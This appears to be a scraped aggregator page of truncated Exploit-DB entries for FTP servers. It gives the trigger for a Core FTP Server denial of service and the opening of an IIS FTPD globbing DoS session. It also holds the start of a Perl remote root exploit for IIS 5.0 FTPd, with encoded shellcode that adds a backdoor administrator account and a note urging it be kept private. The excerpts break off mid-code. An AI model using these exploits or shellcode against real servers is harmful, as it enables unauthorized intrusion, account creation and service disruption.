FROM:exploit-db
# Title: Core FTP Server 1.0 Build 319 Denial of Service
# EDB-ID: 10303
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mert SARICA
# Published: 2009-12-04
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send “USER test\r\n” and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.
阅读全文
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
阅读全文
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
阅读全文
